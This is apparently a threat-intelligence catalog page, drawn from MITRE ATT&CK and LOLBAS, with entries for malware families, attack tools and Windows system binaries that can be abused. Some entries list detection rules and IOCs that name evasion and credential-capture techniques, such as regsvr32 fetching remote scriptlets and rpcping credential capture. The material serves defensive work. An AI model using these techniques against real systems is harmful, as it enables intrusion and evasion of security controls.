* Sigma: proc_creation_win_regsvr32_susp_parent.yml
* Sigma: proc_creation_win_regsvr32_susp_child_process.yml
* Sigma: proc_creation_win_regsvr32_susp_exec_path_1.yml
* Sigma: proc_creation_win_regsvr32_network_pattern.yml
* Sigma: net_connection_win_regsvr32_network_activity.yml
* Sigma: dns_query_win_regsvr32_network_activity.yml
* Sigma: proc_creation_win_regsvr32_flags_anomaly.yml
* Sigma: file_event_win_net_cli_artefact.yml
* Splunk: detect_regsvr32_application_control_bypass.yml
* Elastic: defense_evasion_suspicious_managedcode_host_process.toml
* Elastic: execution_register_server_program_connecting_to_the_internet.toml
* IOC: regsvr32.exe retrieving files from Internet
* IOC: regsvr32.exe executing scriptlet (sct) files
* IOC: DotNet CLR libraries loaded into regsvr32.exe
* IOC: DotNet CLR Usage Log - regsvr32.exe.log[LOLBAS Regsvr32]

Internal MISP references

UUID 533d2c42-45a7-456e-af75-b61e2aff98a7 which can be used as unique global reference for Regsvr32 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5153
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '32be7240-e5ea-4e8a-8e95-7c1bd7869754', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Remcos

Remcos is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. Remcos has been observed being used in malware campaigns.[Riskiq Remcos Jan 2018][Talos Remcos Aug 2018]

Internal MISP references

UUID 2eb92fa8-514e-4018-adc4-c9fe4f082567 which can be used as unique global reference for Remcos in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0332
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['tool']
Related clusters

To see the related clusters, click here.

Remexi

Remexi is a Windows-based Trojan that was developed in the C programming language.[Securelist Remexi Jan 2019]

Internal MISP references

UUID 82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb which can be used as unique global reference for Remexi in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0375
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Remote

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Debugging tool included with Windows Debugging Tools

Author: mr.d0x

Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe

Resources: * https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/

Detection: * IOC: remote.exe process spawns * Sigma: proc_creation_win_lolbin_remote.yml[Remote.exe - LOLBAS Project]

Internal MISP references

UUID 3a1436e9-ce2c-449e-a670-c1b212ebd754 which can be used as unique global reference for Remote in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5234
source Tidal Cyber
tags ['828f1559-b13d-4426-9dcf-5f601fcb6ff0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

RemoteCMD

RemoteCMD is a custom tool used by APT3 to execute commands on a remote system similar to SysInternal's PSEXEC functionality. [Symantec Buckeye]

Internal MISP references

UUID 57fa64ea-975a-470a-a194-3428148ae9ee which can be used as unique global reference for RemoteCMD in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0166
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

RemoteUtilities

RemoteUtilities is a legitimate remote administration tool that has been used by MuddyWater since at least 2021 for execution on target machines.[Trend Micro Muddy Water March 2021]

Internal MISP references

UUID 8a7fa0df-c688-46be-94bf-462fae33b788 which can be used as unique global reference for RemoteUtilities in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0592
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

Remsec

Remsec is a modular backdoor that has been used by Strider and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. [Symantec Strider Blog]

Internal MISP references

UUID e3729cff-f25e-4c01-a7a1-e8b83e903b30 which can be used as unique global reference for Remsec in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0125
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Replace

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to replace file with another file

Author: Oddvar Moe

Paths: * C:\Windows\System32\replace.exe * C:\Windows\SysWOW64\replace.exe

Resources: * https://twitter.com/elceef/status/986334113941655553 * https://twitter.com/elceef/status/986842299861782529

Detection: * IOC: Replace.exe retrieving files from remote server * Sigma: proc_creation_win_lolbin_replace.yml[Replace.exe - LOLBAS Project]

Internal MISP references

UUID 19a04c82-f816-464c-b050-a57269cba157 which can be used as unique global reference for Replace in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5154
source Tidal Cyber
tags ['accb4d24-4b40-41ce-ae2e-adcca7e80b41', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Responder

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [GitHub Responder]

Internal MISP references

UUID 2a5ea3a7-9873-4a2e-b4b5-4e27a80db305 which can be used as unique global reference for Responder in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0174
source MITRE
tags ['af5e9be5-b86e-47af-91dd-966a5e34a186', '6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '61cdbb28-cbfd-498b-9ab1-1f14337f9524', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c']
type ['tool']
Related clusters

To see the related clusters, click here.

Revenge RAT

Revenge RAT is a freely available remote access tool written in .NET (C#).[Cylance Shaheen Nov 2018][Cofense RevengeRAT Feb 2019]

Internal MISP references

UUID f99712b4-37a2-437c-92d7-fb4f94a1f892 which can be used as unique global reference for Revenge RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0379
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

REvil

REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[Secureworks REvil September 2019][Intel 471 REvil March 2020][Group IB Ransomware May 2020]

Internal MISP references

UUID 9314531e-bf46-4cba-9c19-198279ccf9cd which can be used as unique global reference for REvil in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0496
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '286918d5-0b48-4655-9118-907b53de0ee0', '93c53801-5427-4678-a753-7fc761e9eda1', '1138181b-b2cf-4b6b-82da-10867aa4089d', '00ec2407-cc63-4b62-b967-c3e06bdddd2f', '1cc90752-70a3-4a17-b370-e1473a212f79', '0e948c57-6c10-4576-ad27-9832cc2af3a1', '0ed7d10c-c65b-4174-9edb-446bf301d250', '1b98f09a-7d93-4abb-8f3e-1eacdb9f9871', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

RGDoor

RGDoor is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. RGDoor has been seen deployed on web servers belonging to Middle East government organizations. RGDoor provides backdoor access to compromised IIS servers. [Unit 42 RGDoor Jan 2018]

Internal MISP references

UUID d5649d69-52d4-4198-9683-b250348dea32 which can be used as unique global reference for RGDoor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0258
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Rifdoor

Rifdoor is a remote access trojan (RAT) that shares numerous code similarities with HotCroissant.[Carbon Black HotCroissant April 2020]

Internal MISP references

UUID ca5ae7c8-467a-4434-82fc-db50ce3fc671 which can be used as unique global reference for Rifdoor in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0433
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

RIPTIDE

RIPTIDE is a proxy-aware backdoor used by APT12. [Moran 2014]

Internal MISP references

UUID 00fa4cc2-6f99-4b18-b927-689964ef57e1 which can be used as unique global reference for RIPTIDE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0003
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Rising Sun

Rising Sun is a modular backdoor that was used extensively in Operation Sharpshooter between 2017 and 2019. Rising Sun infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed Rising Sun included some source code from Lazarus Group's Trojan Duuzer.[McAfee Sharpshooter December 2018]

Internal MISP references

UUID 19b1f1c8-5ef3-4328-b605-38e0bafc084d which can be used as unique global reference for Rising Sun in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0448
source MITRE
type ['malware']

ROADTools

ROADTools is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.[ROADtools Github]

Internal MISP references

UUID 15bc8e94-64d1-4f1f-bc99-08cfbac417dc which can be used as unique global reference for ROADTools in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0684
source MITRE
tags ['c9c73000-30a5-4a16-8c8b-79169f9c24aa']
type ['tool']
Related clusters

To see the related clusters, click here.

RobbinHood

RobbinHood is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.[CarbonBlack RobbinHood May 2019][BaltimoreSun RobbinHood May 2019]

Internal MISP references

UUID b65956ef-439a-463d-b85e-6606467f508a which can be used as unique global reference for RobbinHood in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0400
source MITRE
tags ['ce9f1048-09c1-49b0-a109-dd604afbf3cd', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

ROCKBOOT

ROCKBOOT is a bootkit that has been used by an unidentified, suspected China-based group. [FireEye Bootkits]

Internal MISP references

UUID cb7aa34e-312f-4210-be7b-47a1e3f5b7b5 which can be used as unique global reference for ROCKBOOT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0112
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

RogueRobin

RogueRobin is a payload used by DarkHydrus that has been developed in PowerShell and C#. [Unit 42 DarkHydrus July 2018][Unit42 DarkHydrus Jan 2019]

Internal MISP references

UUID 852cf78d-9cdc-4971-a972-405921027436 which can be used as unique global reference for RogueRobin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0270
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

ROKRAT

ROKRAT is a cloud-based remote access tool (RAT) used by APT37 to target victims in South Korea. APT37 has used ROKRAT during several campaigns from 2016 through 2021.[Talos ROKRAT][Talos Group123][Volexity InkySquid RokRAT August 2021]

Internal MISP references

UUID a3479628-af0b-4088-8d2a-fafa384731dd which can be used as unique global reference for ROKRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0240
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

RotaJakiro

RotaJakiro is a 64-bit Linux backdoor used by APT32. First seen in 2018, it uses a plugin architecture to extend its capabilities. RotaJakiro can determine its permission level and execute according to access type (root or user).[RotaJakiro 2021 netlab360 analysis][netlab360 rotajakiro vs oceanlotus]

Internal MISP references

UUID 169bfcf6-544c-5824-a7cd-2d5070304b57 which can be used as unique global reference for RotaJakiro in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S1078
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

route

route can be used to find or change information within the local system IP routing table. [TechNet Route]

Internal MISP references

UUID 3b755518-9085-474e-8bc4-4f9344d9c8af which can be used as unique global reference for route in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0103
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

Rover

Rover is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. [Palo Alto Rover]

Internal MISP references

UUID ef38ff3e-fa36-46f2-a720-3abaca167b04 which can be used as unique global reference for Rover in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0090
source MITRE
type ['malware']

Royal

Royal is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. Royal employs partial encryption and multiple threads to evade detection and speed up encryption. Royal has been used in attacks against multiple industries worldwide, including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in Royal and Conti attacks and noted a possible connection between their operators.[Microsoft Royal ransomware November 2022][Cybereason Royal December 2022][Kroll Royal Deep Dive February 2023][Trend Micro Royal Linux ESXi February 2023][CISA Royal AA23-061A March 2023]

Internal MISP references

UUID 221e24cb-910f-5988-9473-578ef350870c which can be used as unique global reference for Royal in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1073
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Rpcping

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to verify rpc connection

Author: Oddvar Moe

Paths:
* C:\Windows\System32\rpcping.exe
* C:\Windows\SysWOW64\rpcping.exe

Resources:
* https://github.com/vysec/RedTips
* https://twitter.com/vysecurity/status/974806438316072960
* https://twitter.com/vysecurity/status/873181705024266241
* https://twitter.com/splinter_code/status/1421144623678988298

Detection:
* Sigma: proc_creation_win_rpcping_credential_capture.yml [Rpcping.exe - LOLBAS Project]

Internal MISP references

UUID 3e42b791-fb59-4a8e-a27e-1cc544f353ee which can be used as unique global reference for Rpcping in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5155
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Rsockstun

Rsockstun is an open-source software project. According to its GitHub repository, Rsockstun is a reverse socks5 tunneler with SSL, ntlm, and proxy support.[GitHub rsockstun]

Internal MISP references

UUID c3b9281b-5f18-4119-903e-c27f1a4004b4 which can be used as unique global reference for Rsockstun in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5076
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']
Related clusters

To see the related clusters, click here.

RTM

RTM is custom malware written in Delphi. It is used by the group of the same name (RTM). Newer versions of the malware have been reported publicly as Redaman.[ESET RTM Feb 2017][Unit42 Redaman January 2019]

Internal MISP references

UUID 1836485e-a3a6-4fae-a15d-d0990788811a which can be used as unique global reference for RTM in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0148
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Rubeus

Rubeus is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.[GitHub Rubeus March 2023][FireEye KEGTAP SINGLEMALT October 2020][DFIR Ryuk's Return October 2020][DFIR Ryuk 2 Hour Speed Run November 2020]

Internal MISP references

UUID 2e54f40c-ab62-535e-bbab-3f3a835ff55a which can be used as unique global reference for Rubeus in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1071
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['tool']
Related clusters

To see the related clusters, click here.

Ruler

Ruler is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of Ruler have also released a defensive tool, NotRuler, to detect its usage.[SensePost Ruler GitHub][SensePost NotRuler]

Internal MISP references

UUID 69563cbd-7dc1-4396-b576-d5886df11046 which can be used as unique global reference for Ruler in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Office 365', 'Windows']
software_attack_id S0358
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

Rundll32

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to execute dll files

Author: Oddvar Moe

Paths:
* C:\Windows\System32\rundll32.exe
* C:\Windows\SysWOW64\rundll32.exe

Resources:
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
* https://github.com/sailay1996/expl-bin/blob/master/obfus.md
* https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
* https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
* https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code

Detection:
* Sigma: net_connection_win_rundll32_net_connections.yml
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Elastic: defense_evasion_unusual_network_connection_via_rundll32.toml
* IOC: Outbound Internet/network connections made from rundll32
* IOC: Suspicious use of cmdline flags such as -sta [Rundll32.exe - LOLBAS Project]

Internal MISP references

UUID cd5a27c8-9611-41d9-b839-b0ba7daf58b5 which can be used as unique global reference for Rundll32 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5156
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'd28b269e-588d-49ed-b5c9-8e82077924c0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Runexehelper

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Launcher process

Author: Grzegorz Tworek

Paths:
* c:\windows\system32\runexehelper.exe

Resources:
* https://twitter.com/0gtweet/status/1206692239839289344

Detection:
* Sigma: proc_creation_win_lolbin_runexehelper.yml
* IOC: c:\windows\system32\runexehelper.exe is run
* IOC: Existence of runexewithargs_output.txt file [Runexehelper.exe - LOLBAS Project]

Internal MISP references

UUID db516b7d-e5bd-4da8-a708-2fe5d2a2fdfd which can be used as unique global reference for Runexehelper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5157
source Tidal Cyber
tags ['270a347d-d2e1-4d46-9b32-37e8d7264301', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

RunningRAT

RunningRAT is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with Gold Dragon and Brave Prince. [McAfee Gold Dragon]

Internal MISP references

UUID e8afda1f-fa83-4fc3-b6fb-7d5daca7173f which can be used as unique global reference for RunningRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0253
source MITRE
type ['malware']

Runonce

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Executes a Run Once Task that has been configured in the registry

Author: Oddvar Moe

Paths:
* C:\Windows\System32\runonce.exe
* C:\Windows\SysWOW64\runonce.exe

Resources:
* https://twitter.com/pabraeken/status/990717080805789697
* https://cmatskas.com/configure-a-runonce-task-on-windows/

Detection:
* Sigma: registry_event_runonce_persistence.yml
* Sigma: proc_creation_win_runonce_execution.yml
* Elastic: persistence_run_key_and_startup_broad.toml
* IOC: Registry key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY [Runonce.exe - LOLBAS Project]

Internal MISP references

UUID ccad36ac-b526-44ec-840a-6f498c51781c which can be used as unique global reference for Runonce in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5158
source Tidal Cyber
tags ['065db33d-c152-4ba9-8bf9-13616f78ae05', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Runscripthelper

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Execute target PowerShell script

Author: Oddvar Moe

Paths:
* C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
* C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

Resources:
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc

Detection:
* Sigma: proc_creation_win_lolbin_runscripthelper.yml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: Event 4014 - Powershell logging
* IOC: Event 400 [Runscripthelper.exe - LOLBAS Project]

Internal MISP references

UUID 035bae51-c1cc-46f0-8532-a5d01c4d4a52 which can be used as unique global reference for Runscripthelper in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5159
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Ryuk

Ryuk is ransomware designed to target enterprise environments that has been used in attacks since at least 2018. Ryuk shares code similarities with Hermes ransomware.[CrowdStrike Ryuk January 2019][FireEye Ryuk and Trickbot January 2019][FireEye FIN6 Apr 2019]

Internal MISP references

UUID 8ae86854-4cdc-49eb-895a-d1fa742f7974 which can be used as unique global reference for Ryuk in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0446
source MITRE
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '12a2e20a-7c27-46bb-954d-b372833a9925', 'c2380542-36f2-4922-9ed2-80ced06645c9', 'c8ce7130-e134-492c-a98a-ed1d25b57e4c', '2743d495-7728-4a75-9e5f-b64854039792', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Saint Bot

Saint Bot is a .NET downloader that has been used by Ember Bear since at least March 2021.[Malwarebytes Saint Bot April 2021][Palo Alto Unit 42 OutSteel SaintBot February 2022]

Internal MISP references

UUID d66e5d18-e9f5-4091-bdf4-acdac129e2e0 which can be used as unique global reference for Saint Bot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1018
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Sakula

Sakula is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. [Dell Sakula]

Internal MISP references

UUID a316c704-144a-4d14-8e4e-685bb6ae391c which can be used as unique global reference for Sakula in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0074
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

SamSam

SamSam is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.[US-CERT SamSam 2018][Talos SamSam Jan 2018][Sophos SamSam Apr 2018][Symantec SamSam Oct 2018]

Internal MISP references

UUID 88831e9f-453e-466f-9510-9acaa1f20368 which can be used as unique global reference for SamSam in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0370
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

Sardonic

Sardonic is a backdoor written in C and C++ that is known to have been used by FIN8 as early as August 2021 to target a financial institution in the United States. Sardonic has a plugin system that can load specially made DLLs and execute their functions.[Bitdefender Sardonic Aug 2021][Symantec FIN8 Jul 2023]

Internal MISP references

UUID 9ab0d523-3496-5e64-9ca1-bb756f5e64e0 which can be used as unique global reference for Sardonic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1085
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Sc

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to manage services

Author: Oddvar Moe

Paths:
* C:\Windows\System32\sc.exe
* C:\Windows\SysWOW64\sc.exe

Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

Detection:
* Sigma: proc_creation_win_susp_service_creation.yml
* Sigma: proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml
* Sigma: proc_creation_win_sc_service_path_modification.yml
* Splunk: sc_exe_manipulating_windows_services.yml
* Elastic: lateral_movement_cmd_service.toml
* IOC: Unexpected service creation
* IOC: Unexpected service modification [Sc.exe - LOLBAS Project]

Internal MISP references

UUID 41be663f-ecc9-4ab6-afeb-c52737f84858 which can be used as unique global reference for Sc in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5160
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

schtasks

schtasks is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. [TechNet Schtasks]

Internal MISP references

UUID 2aacbf3a-a359-41d2-9a71-76447f0545b5 which can be used as unique global reference for schtasks in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0111
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'f0c54030-956a-4bac-9f98-deb2349183ac', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Scriptrunner

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Execute binary through proxy binary to evade defensive countermeasures

Author: Oddvar Moe

Paths:
* C:\Windows\System32\scriptrunner.exe
* C:\Windows\SysWOW64\scriptrunner.exe

Resources:
* https://twitter.com/KyleHanslovan/status/914800377580503040
* https://twitter.com/NickTyrer/status/914234924655312896
* https://github.com/MoooKitty/Code-Execution

Detection:
* Sigma: proc_creation_win_servu_susp_child_process.yml
* IOC: Scriptrunner.exe should not be in use unless App-V is deployed [Scriptrunner.exe - LOLBAS Project]

Internal MISP references

UUID ba4d8522-9656-462e-b25e-32a9bba85a60 which can be used as unique global reference for Scriptrunner in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5161
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Scrobj

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Script Component Runtime

Author: Eral4m

Paths:
* c:\windows\system32\scrobj.dll
* c:\windows\syswow64\scrobj.dll

Resources:
* https://twitter.com/eral4m/status/1479106975967240209

Detection:
* IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line [Scrobj.dll - LOLBAS Project]

Internal MISP references

UUID 101f7867-9c5c-482e-b26e-9fdb8ff9b2c7 which can be used as unique global reference for Scrobj in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5194
source Tidal Cyber
